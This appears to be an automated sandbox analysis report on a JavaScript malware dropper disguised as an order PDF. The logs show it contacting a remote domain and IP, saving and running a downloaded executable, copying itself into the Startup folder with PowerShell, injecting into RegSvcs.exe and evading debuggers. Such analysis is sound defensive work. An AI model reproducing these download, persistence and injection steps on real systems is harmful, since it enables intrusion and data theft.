            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
            Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN
            Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe
            Source: classification engine, Classification label: mal100.spre.troj.adwa.spyw.evad.winJS@14/10@1/2
            Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Mutant created: \Sessions\1\BaseNamedObjects\Rmc-CMFPLR
            Source: C:\Windows\System32\wscript.exe, File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Binary string: RuDl.pdb source: VNZVNCXKKJSF.exe, 0000000A.00000002.414602354.0000000002920000.00000004.08000000.00040000.00000000.sdmp, VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdbBSJB source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdb source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject%22");ITextStream.WriteLine(" entry:1716 f:_0x56566c a0:237");ITextStream.WriteLine(" exit:1716 f:_0x56566c r:%22BQ9o%22");ITextStream.WriteLine(" entry:1712 f:_0x155c25 a0:127 a1:%22BQ9o%22");ITextStream.WriteLine(" exit:1712 f:_0x155c25 r:%22ADODB.Stream%22");IHost.Name();ITextStream.WriteLine(" entry:1703 o:Windows%20Script%20Host f:CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:1703 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:1813 f:_0x445216 a0:205 a1:%22%5Epwq%22");ITextStream.WriteLine(" exit:1813 f:_0x445216 r:%22Open%22");_Stream._00000000();ITextStream.WriteLine(" entry:1809 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:1809 o: f:Open r:undefined");ITextStream.WriteLine(" entry:1823 f:_0x115fc7 a0:136");ITextStream.WriteLine(" exit:1823 f:_0x115fc7 r:%22Type%22");_Stream.Type("1");ITextStream.WriteLine(" entry:1832 f:_0x445216 a0:241 a1:%22h2t%24%22");ITextStream.WriteLine(" exit:1832 f:_0x445216 r:%22Write%22");IServerXMLHTTPRequest2.responseBody();_Stream._00000000();ITextStream.WriteLine(" entry:1828 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:1828 o: f:Write r:undefined");ITextStream.WriteLine(" entry:1846 f:_0x115fc7 a0:144");ITextStream.WriteLine(" exit:1846 f:_0x115fc7 r:%22Position%22");_Stream.Position("0");ITextStream.WriteLine(" entry:1855 f:_0x115fc7 a0:124");ITextStream.WriteLine(" exit:1855 f:_0x115fc7 r:%22SaveToFile%22");_Stream._00000000();ITextStream.WriteLine(" entry:1851 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5CVNZVNCXKKJSF.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:1851 o: f:SaveToFile 
r:undefined");ITextStream.WriteLine(" entry:1866 f:_0x445216 a0:232 a1:%22zn0Y%22");ITextStream.WriteLine(" exit:1866 f:_0x445216 r:%22Close%22");_Stream._00000000();ITextStream.WriteLine(" entry:1862 o: f:Close");_Stream.Close();_Stream._00000000();ITextStream.WriteLine(" exit:1862 o: f:Close r:undefined");ITextStream.WriteLine(" entry:1878 f:_0x115fc7 a0:110");ITextStream.WriteLine(" exit:1878 f:_0x115fc7 r:%22Shell.Application%22");ITextStream.WriteLine(" entry:1883 f:_0x56566c a0:269");ITextStream.WriteLine(" exit:1883 f:_0x56566c r:%22ShellExecute%22");ITextStream.WriteLine(" entry:1891 f:_0x155c25 a0:125 a1:%22vUkl%22");ITextStream.WriteLine(" exit:1891 f:_0x155c25 r:%22open%22");IShellDispatch6._00000000();ITextStream.WriteLine(" entry:1872 o: f:ShellExecute a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5CVNZVNCXKKJSF.exe%22 a1:%22%22 a2:%22%22 a3:%22open%22 a4:%221%22");IShellDispatch6.ShellExecute("C:\Users\user\AppData\Local\Temp\VN", "", "", "open", "1")
            Source: Order Specifications PDF.js, Initial file: High amount of function use 12
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF56AF push esp; iretd 11_2_02CF56B2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF56AB push esp; iretd 11_2_02CF56AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF56A9 push esp; iretd 11_2_02CF56AA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF56BF push ebp; iretd 11_2_02CF56C2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF56BB push ebp; iretd 11_2_02CF56BE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF56B7 push ebp; iretd 11_2_02CF56BA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF56B3 push esp; iretd 11_2_02CF56B6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF04C3 push eax; ret 11_2_02CF04C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CFBACF push eax; retf 11_2_02CFBAD9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF0E58 pushad ; retf 11_2_02CF0E59
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02CF0FC3 push eax; mov dword ptr [esp], edx 11_2_02CF0FCC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02D1B250 push FFFFFF8Bh; iretd 11_2_02D1B25D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02D1B262 pushfd ; iretd 11_2_02D1B263
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02D140A0 push 00000005h; ret 11_2_02D140B5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02D13DAF push 00000005h; ret 11_2_02D13DC5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_02DB5367 push FFFFFF8Bh; iretd 11_2_02DB5374
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 13_2_02EFF8CD push FFFFFF9Fh; retn 004Dh 13_2_02EFF8D6
            Source: initial sample, Static PE information: section name: .text entropy: 7.96732682517633
            Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
            Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe

            Boot Survival

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\wscript.exe, File deleted: c:\users\user\desktop\order specifications pdf.js
            Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: powershell.exe PID: 5224, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3712, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe TID: 1632 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe TID: 5152 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5392 Thread sleep count: 8782 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168 Thread sleep count: 42 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4636 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe TID: 1220 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe TID: 4888 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004 Thread sleep count: 646 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8782
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 646
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Thread delayed: delay time: 30000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Thread delayed: delay time: 30000
            Source: powershell.exe, 0000000B.00000003.602907132.00000000050C5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
            Source: powershell.exe, 0000000B.00000003.602907132.00000000050C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.791732369.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: RegSvcs.exe, 0000000D.00000002.776742894.0000000001182000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

            Anti Debugging

            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Code function: 17_2_00EE29F8 CheckRemoteDebuggerPresent, 17_2_00EE29F8
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe File created: VNZVNCXKKJSF[1].exe.0.dr
            Source: C:\Windows\System32\wscript.exe Network Connect: 50.115.174.192 443
            Source: C:\Windows\System32\wscript.exe Domain query: tgc8x.tk
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 456000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46E000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 474000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 475000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 476000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47B000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FBC008
            Source: VNZVNCXKKJSF[1].exe.0.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.cs Reference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')
            Source: VNZVNCXKKJSF.exe.0.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.cs Reference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')
            Source: Systedbddfm.exe.11.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.cs Reference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
            Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerLR\
            Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerV,op"
            Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ,pp!
            Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, logs.dat.13.dr Binary or memory string: [Program Manager]
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Queries volume information: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
